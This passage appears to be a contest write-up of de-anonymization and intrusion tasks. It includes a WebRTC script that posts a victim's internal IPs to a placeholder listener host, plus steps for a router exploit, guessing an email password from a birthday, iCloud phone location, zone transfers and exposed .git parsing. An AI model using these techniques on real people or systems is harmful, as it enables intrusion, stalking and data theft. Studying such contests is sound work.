Then copy the title in the top left-hand corner of the photo, enlarge it and run through the translation service, a link to which is given in the hint, and then run it through Google Translate and see the name: <b>Haru Sakata</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-jviSDw5gioQ/U8YPD5jCW6I/AAAAAAAAEJM/8ymrOXPyPtg/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-jviSDw5gioQ/U8YPD5jCW6I/AAAAAAAAEJM/8ymrOXPyPtg/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F4.png" height="299" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-KbXhcjdNslc/U8YPS1XzupI/AAAAAAAAEJU/3UF0pFZq-Is/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-KbXhcjdNslc/U8YPS1XzupI/AAAAAAAAEJU/3UF0pFZq-Is/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F5.png" height="310" width="640" /></a></div><br /><br />And here's what happens if you don't enlarge the image:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-YyNEXkZ2pwc/U8YPXv0hvmI/AAAAAAAAEJc/eXzF64Mx0Mo/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-YyNEXkZ2pwc/U8YPXv0hvmI/AAAAAAAAEJc/eXzF64Mx0Mo/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F6.png" height="198" width="640" /></a></div><br /><br />The task is not solved yet; the participants should still find out the businessman's birthdate and place of work.<br /><br />There are four users named <b>Haru 
Sakata</b> on Twitter. The contest's organizers made up three accounts especially for the contest. Google Images can help to tell the "real" account by showing, for instance, that the particular person is a famous Japanese actor.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-zDO0DbaRdRI/U8YPngvQdxI/AAAAAAAAEJk/PlIEUJ1tskw/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-zDO0DbaRdRI/U8YPngvQdxI/AAAAAAAAEJk/PlIEUJ1tskw/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F7.png" height="344" width="640" /></a></div><br /><br /><b>Solved by: </b>4 participants<br /><br /><b>Points:</b> 20<br /><br /><b>2.3 Looking for a French lawyer</b><br /><b><br /></b><b>Nickname:</b> Counsel<br /><br /><b>About:</b> ATH case: <a href="http://athc.biz/docs/46a2934643bf3f80c530aee55195594d.docx">http://athc.biz/docs/46a2934643bf3f80c530aee55195594d.docx</a>.<br /><br />ATH has plenty of data about this person: name, e-mail and even a piece of a photo. 
The original photo can be found inside the document at: <a href="zip://46a2934643bf3f80c530aee55195594d.docx/word/media/image2.emf">zip://46a2934643bf3f80c530aee55195594d.docx/word/media/image2.emf</a><br /><br />Things are getting clearer now: the metal structure in the photo is there for a reason; it means the person has something to do with Paris.<br /><br />However, 5 participants couldn't tell the real <b>counsel</b> from his twins, who had the same photos but no relation to Paris.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-ODpKpYBW7QQ/U8YP0YkjPVI/AAAAAAAAEJs/B_gRo1FFDYo/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-ODpKpYBW7QQ/U8YP0YkjPVI/AAAAAAAAEJs/B_gRo1FFDYo/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F8.png" /></a></div><br /><br /><b>Solved by:</b> 9 participants<br /><br /><b>Points:</b> 20<br /><br /><b>2.4. Third-level domains and a Facebook account</b><br /><br /><b>Nickname: </b>PakistaniChristian<br /><br /><b>About:</b> Yo dawg, I heard you like subdomains, so I put three levels in yo subdomains so you can use subdomains while yo surf domains.<br /><br /><b>Hint:</b> We got data that their domain is ftp.wwidol.com.<br /><br /><b>Hint 2:</b> You are still looking in the wrong places. Why do you think there is an e-mail?<br /><br />The only thing we didn't account for in the answer checker was that the contest's participants (or organizers) could mix up first and last names, in which case none of the answers would be accepted.<br /><br />Still, the task was quite simple: find the subdomain of <a href="http://ftp.wwidol.com/">ftp.wwidol.com</a> (by brute-forcing names or sending AXFR zone transfer requests, which the wwidol.com domain allows) that permits anonymous FTP access. 
There's good old thumbs.db from the Windows XP age in the folder /images_upload/.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-FROfwr32t_s/U8YQHIOB9rI/AAAAAAAAEJ0/huQSbB_FxXk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-FROfwr32t_s/U8YQHIOB9rI/AAAAAAAAEJ0/huQSbB_FxXk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F9.png" height="185" width="400" /></a></div><br /> This file contains certain thumbnails and provides names of the images that were cached by the operating system.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ZtP-dUl08qY/U8YQO8W6HiI/AAAAAAAAEJ8/-ngd6MtHhng/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-ZtP-dUl08qY/U8YQO8W6HiI/AAAAAAAAEJ8/-ngd6MtHhng/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F10.png" height="210" width="320" /></a></div><br />E-mail won't help this time, we'd better recall other de-anonymization techniques.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-REAtUd-M1pg/U8YQWRUxneI/AAAAAAAAEKE/vEGjBOyZ3Yw/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-REAtUd-M1pg/U8YQWRUxneI/AAAAAAAAEKE/vEGjBOyZ3Yw/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F11.png" height="286" width="400" /></a></div><br /><br />Having the photo of the person helps to tell the "real" accounts from fake.<br /><br /><b>Solved by:</b> 5 participants<br /><br /><b>Points:</b> 20<br /><br 
/><b>2.5. Breaking through to ATH</b><br /><br /><b>Nickname:</b> <a href="mailto:johnsmith@athc.biz">johnsmith@athc.biz</a><br /><br /><b>Hint:</b> We’ve managed to track the IP address of ATH which they use to access the internet. You may use this exploit to obtain the internal IP: <a href="http://net.ipcalf.com/">http://net.ipcalf.com/</a>.<br /><br />Now the participants should find information about an ATH employee named John Smith. If you send an e-mail to johnsmith@athc.biz, you receive a reply with two hints.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Eqo2vtV-Jhk/U8YQmhFJXQI/AAAAAAAAEKM/CgrDwPl2Xz0/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-Eqo2vtV-Jhk/U8YQmhFJXQI/AAAAAAAAEKM/CgrDwPl2Xz0/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F12.png" height="154" width="320" /></a></div><br />The first hint is that something like an antivirus checks all the links in incoming e-mails, for viruses or perhaps for some other purpose.<br /><br />The second: a NetGear N600 router faces the internet, and it has interesting vulnerabilities: <a href="http://www.exploit-db.com/exploits/32883/">http://www.exploit-db.com/exploits/32883/</a><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-nr1W40QBXeY/U8YQvLNEvCI/AAAAAAAAEKU/gEhdQYfenyM/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-nr1W40QBXeY/U8YQvLNEvCI/AAAAAAAAEKU/gEhdQYfenyM/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F13.png" height="166" width="320" /></a></div><br />What happens if we add a link to our resource to the 
"antivirus":<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-n6VBz5ybhIo/U8YQ0zs8C4I/AAAAAAAAEKc/Bfl-9R1Mhvc/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-n6VBz5ybhIo/U8YQ0zs8C4I/AAAAAAAAEKc/Bfl-9R1Mhvc/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F14.png" height="33" width="400" /></a></div><br /> The router with the mentioned vulnerabilities is actually located at IP 162.243.77.131. Exploitation of these vulnerabilities allows getting, say, an admin password despite HTTP 401:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-qYJ2wJ7qSUQ/U8YQ-KwbEFI/AAAAAAAAEKk/2uNB7u0d5hY/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-qYJ2wJ7qSUQ/U8YQ-KwbEFI/AAAAAAAAEKk/2uNB7u0d5hY/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F15.png" height="165" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Sy39JI-myA8/U8YRHP5aobI/AAAAAAAAEKs/tIj-mKrQuZE/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-Sy39JI-myA8/U8YRHP5aobI/AAAAAAAAEKs/tIj-mKrQuZE/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F16.png" height="147" width="400" /></a></div><br />This router model has more features: logo's attached to the page's footer (as many providers do today), SMB Manager, which allows access to an internal network by using Java Applet—you just need to know an IP address.<br /><br /><div class="separator" 
style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-ORH_Syt2Ntw/U8YRO9ouX1I/AAAAAAAAEK0/b81b2ElMsV4/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-ORH_Syt2Ntw/U8YRO9ouX1I/AAAAAAAAEK0/b81b2ElMsV4/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F17.png" height="241" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-n8iuDiT2oPk/U8YRWTAy9UI/AAAAAAAAEK8/KxzWguXapQk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-n8iuDiT2oPk/U8YRWTAy9UI/AAAAAAAAEK8/KxzWguXapQk/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F18.png" height="285" width="400" /></a></div><br /><br />As the hint suggests, the internal IP address can be obtained by way of the footer-changing form for the router's HTML pages, using a modified version of the exploit given in the hint. Here is the net.ipcalf.com script changed to submit every address it discovers to a listener of ours (the form posts to http://listenhost:port/):<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-x5pmrVM6Txg/U8Yf3h4i9CI/AAAAAAAAELM/Ffm6IFHi0JQ/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-x5pmrVM6Txg/U8Yf3h4i9CI/AAAAAAAAELM/Ffm6IFHi0JQ/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F20.png" height="296" width="400" /></a></div><br /><br /><pre style="font-family: Courier New, Courier, monospace;">&lt;script&gt;
// WebRTC internal-IP leak (based on net.ipcalf.com), modified to POST the result
var RTCPeerConnection = /*window.RTCPeerConnection ||*/ window.webkitRTCPeerConnection || window.mozRTCPeerConnection;
if (RTCPeerConnection) (function () {
    // No STUN/TURN servers: only local "host" candidates get gathered
    var rtc = new RTCPeerConnection({iceServers: []});
    if (window.mozRTCPeerConnection) {
        // Firefox starts gathering candidates only once a data channel exists
        rtc.createDataChannel('', {reliable: false});
    }
    rtc.onicecandidate = function (evt) {
        if (evt.candidate) grepSDP(evt.candidate.candidate);
    };
    rtc.createOffer(function (offerDesc) {
        grepSDP(offerDesc.sdp);
        rtc.setLocalDescription(offerDesc);
    }, function (e) { console.warn("offer failed", e); });

    var addrs = Object.create(null);
    addrs["0.0.0.0"] = false;               // never report the wildcard address

    function updateDisplay(newAddr) {
        if (newAddr in addrs) return;
        addrs[newAddr] = true;
        var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });
        document.getElementById('list').value = displayAddrs.join(" or perhaps ") || "n/a";
        document.form.submit();             // ship the list to the listener as soon as something is found
    }

    function grepSDP(sdp) {
        sdp.split('\r\n').forEach(function (line) {
            if (~line.indexOf("a=candidate")) {
                // a=candidate fields: foundation, component, transport, priority, address, port, "typ", type
                var parts = line.split(' '),
                    addr = parts[4],
                    type = parts[7];
                if (type === 'host') updateDisplay(addr);
            } else if (~line.indexOf("c=")) {
                // c=IN IP4 address
                var parts = line.split(' '),
                    addr = parts[2];
                updateDisplay(addr);
            }
        });
    }
})();
&lt;/script&gt;
&lt;form action="http://listenhost:port/" method="post" name="form"&gt;
    &lt;input id="list" name="value" type="text" /&gt;
&lt;/form&gt;</pre><br />As a result:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-E_CauD1wuo0/U8YgEEuoe7I/AAAAAAAAELU/nEYHpl7Cwhc/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-E_CauD1wuo0/U8YgEEuoe7I/AAAAAAAAELU/nEYHpl7Cwhc/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F21.png" height="197" width="400" /></a></div><br />We also received greetings from one of the participants. 
That greeting was sweet.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-D9BbXKRUX9A/U8YgKVF384I/AAAAAAAAELc/CVVLCerv7vw/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-D9BbXKRUX9A/U8YgKVF384I/AAAAAAAAELc/CVVLCerv7vw/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F22.png" height="320" width="311" /></a></div><br />Now we can try to get access to John Smith's computer and find the answers to the questions:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-LMs_hkvhSRQ/U8YgRwfcGcI/AAAAAAAAELk/H2FrgjVQO9g/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-LMs_hkvhSRQ/U8YgRwfcGcI/AAAAAAAAELk/H2FrgjVQO9g/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F23.png" height="95" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-69xrYC5CVNE/U8YgYtdmvJI/AAAAAAAAELs/pQIPc2MAb0k/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-69xrYC5CVNE/U8YgYtdmvJI/AAAAAAAAELs/pQIPc2MAb0k/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F24.png" height="72" width="400" /></a></div><br /><br /><b>Solved by:</b> 2 participants<br /><br /><b>Points:</b> 35<br /><br /><i>Note:</i> this task, like the following ones, "spawned" new tasks once it was solved.<br /><br /><b>3.1. Trying to engage a girl in a conversation at a dating site</b><br /><br /><b>Nickname:</b> Stripper<br /><br /><b>About:</b> A "talky" girl who doesn't separate her private 
life from the job. Her probable location is 53.2054508, 63.6218262. She uses dating sites to find clients.<br /><br />Two participants found the girl on Facebook and Vkontakte.<br /><br />Actually, we expected the participants to find her on Badoo first, get her talking and make her spill her secrets. Only one participant added her to his friends list (probably by accident), and nobody tried to talk to her. And of course there were several fake accounts that confused the participants and led them to wrong answers.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-nLOv6wvaniM/U8YgsvHGXNI/AAAAAAAAEL0/9Fu-xI8Yrus/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-nLOv6wvaniM/U8YgsvHGXNI/AAAAAAAAEL0/9Fu-xI8Yrus/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F25.png" height="137" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ssb8EzN62Fo/U8YgzLq4fKI/AAAAAAAAEL8/YxBYC56RgMU/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-ssb8EzN62Fo/U8YgzLq4fKI/AAAAAAAAEL8/YxBYC56RgMU/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F26.png" height="240" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><b>Solved by:</b> 2 participants<br /><br /><b>Points:</b> 30<br /><br /><b>3.2. The iPhone gives away the Indian taxi driver</b><br /><br /><b>Nickname:</b> IndianTaxi-driver<br /><br /><b>About:</b> His brother, a counsel, should know everything about him. 
The password for the counsel's e-mail is ... wait … his birthday! What a freaking surprise!<br /><br />To learn everything about the taxi driver, the participants had to get into his brother's e-mail. Those who had solved the third task knew the counsel's birthdate. The driver's own e-mail login and password were sitting in his brother's mailbox,<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-8n6dw0ywNQU/U8YhDxpQQrI/AAAAAAAAEME/kCWpmguqAv8/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-8n6dw0ywNQU/U8YhDxpQQrI/AAAAAAAAEME/kCWpmguqAv8/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F27.png" height="75" width="400" /></a></div><br /> and there we also found out that he uses Apple devices.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-g1MNPjTPcnE/U8YhJWLSujI/AAAAAAAAEMM/MM-5Z6hXGcg/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-g1MNPjTPcnE/U8YhJWLSujI/AAAAAAAAEMM/MM-5Z6hXGcg/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F28.png" height="26" width="400" /></a></div><br /> The iCloud account matched the e-mail address (in any case, we had access to the mailbox and could have recovered the account through it). 
After logging into the iCloud account, the participants just had to locate the iPhone that the organizers had "sent" to Delhi.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-pYRH_vDukmg/U8YhRcZBYCI/AAAAAAAAEMU/EKYTxOX_FlA/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-pYRH_vDukmg/U8YhRcZBYCI/AAAAAAAAEMU/EKYTxOX_FlA/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F29.png" height="287" width="400" /></a></div><br /><b>Solved by: </b>2 participants<br /><br /><b>Points:</b> 40<br /><br /><b>3.3. The Admin's having a little fun</b><br /><br /><b>Nickname:</b> Admin<br /><br /><b>About:</b> The admin of <a href="http://wwidol.com/">wwidol.com</a>.<br /><br />Google shows that wwidol.com exposes a /.git/ directory, and its index and config files give away the admin's GitHub login! 
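Pulling that login out of an exposed .git directory needs no git client. The config file is INI-style text whose [remote "..."] sections hold the repository URLs, and the index is a binary file listing every tracked path (handy for spotting files the web server does not link to). The following Python code is an added example, not the organizers' tooling; the config and index it parses are constructed in the script, with a made-up GitHub account name, to stand in for the files fetched from wwidol.com/.git/.<br /><br />

```python
import hashlib
import re
import struct
from urllib.parse import urlparse

SECTION_RE = re.compile(r'^\s*\[([^\s\]]+)(?:\s+"([^"]*)")?\]\s*$')   # [core] or [remote "origin"]
KEYVAL_RE = re.compile(r'^\s*([A-Za-z][A-Za-z0-9-]*)\s*=\s*(.*?)\s*$')

# Constructed sample of a .git/config; the account name is made up.
SAMPLE_CONFIG = """[core]
\trepositoryformatversion = 0
\tfilemode = true
[remote "origin"]
\turl = git@github.com:wwidol-admin/site.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
\tremote = origin
\tmerge = refs/heads/master
"""


def parse_git_config(text):
    """Parse .git/config into {section: {key: value}}; 'remote "origin"' stays one section name."""
    config, section = {}, None
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith(("#", ";")):
            continue
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1) if m.group(2) is None else '%s "%s"' % (m.group(1), m.group(2))
            config.setdefault(section, {})
            continue
        m = KEYVAL_RE.match(line)
        if m and section is not None:
            config[section][m.group(1).lower()] = m.group(2)
    return config


def github_owner(url):
    """Owner part of a GitHub remote URL: https://, ssh:// or the scp-like git@github.com:owner/repo form."""
    m = re.match(r"^[\w.-]+@github\.com:([^/]+)/", url)      # scp-like syntax has no scheme
    if m:
        return m.group(1)
    parsed = urlparse(url)
    if parsed.hostname == "github.com":
        parts = parsed.path.strip("/").split("/")
        if parts and parts[0]:
            return parts[0]
    return None


def github_accounts(config):
    """GitHub accounts named by any remote in the parsed config, in order of appearance."""
    owners = []
    for section, values in config.items():
        owner = github_owner(values.get("url", "")) if section.startswith("remote ") else None
        if owner and owner not in owners:
            owners.append(owner)
    return owners


def parse_git_index(data):
    """List (path, mode, size) for every entry of a version 2 or 3 .git/index."""
    signature, version, count = struct.unpack("!4sII", data[:12])
    if signature != b"DIRC" or version not in (2, 3):
        raise ValueError("unsupported index: %r v%d" % (signature, version))
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:       # trailing SHA-1 over everything before it
        raise ValueError("index checksum mismatch (truncated download?)")
    entries, offset = [], 12
    for _ in range(count):
        start = offset
        mode = struct.unpack("!I", data[offset + 24:offset + 28])[0]   # after ctime, mtime, dev, ino
        size = struct.unpack("!I", data[offset + 36:offset + 40])[0]   # after uid, gid
        flags = struct.unpack("!H", data[offset + 60:offset + 62])[0]  # after the 20-byte object id
        offset += 62
        if version == 3 and flags & 0x4000:                        # extended flags word present
            offset += 2
        end = data.index(b"\x00", offset)                          # NUL-terminated path
        entries.append((data[offset:end].decode("utf-8"), mode, size))
        offset = start + ((end + 1 - start + 7) // 8) * 8          # entries are padded to 8 bytes
    return entries


def build_sample_index(paths):
    """Constructed version 2 index for the demo (zeroed stat data); a real one comes from the target."""
    body = struct.pack("!4sII", b"DIRC", 2, len(paths))
    for path in paths:
        name = path.encode("utf-8")
        entry = struct.pack("!10I", 0, 0, 0, 0, 0, 0, 0o100644, 0, 0, 123) + b"\x00" * 20
        entry += struct.pack("!H", min(len(name), 0xFFF)) + name + b"\x00"
        entry += b"\x00" * (-len(entry) % 8)
        body += entry
    return body + hashlib.sha1(body).digest()


if __name__ == "__main__":
    print(github_accounts(parse_git_config(SAMPLE_CONFIG)))
    for path, mode, size in parse_git_index(build_sample_index(["index.php", ".htpasswd", "images/logo.png"])):
        print("%06o %6d %s" % (mode, size, path))
```

On a live target the two files come from http://host/.git/config and http://host/.git/index; the checksum at the end of the index catches a truncated download before the path list is trusted.<br /><br />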
That's a stroke of luck!<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-o61F3T62vMU/U8YhjYqRC9I/AAAAAAAAEMc/kqyXFrP3Y64/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-o61F3T62vMU/U8YhjYqRC9I/AAAAAAAAEMc/kqyXFrP3Y64/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F30.png" height="246" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Va-F1ZbbGhg/U8YhqOEK6yI/AAAAAAAAEMk/_qAS26h56cU/s1600/%D0%91%D0%B5%D0%B7+%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" 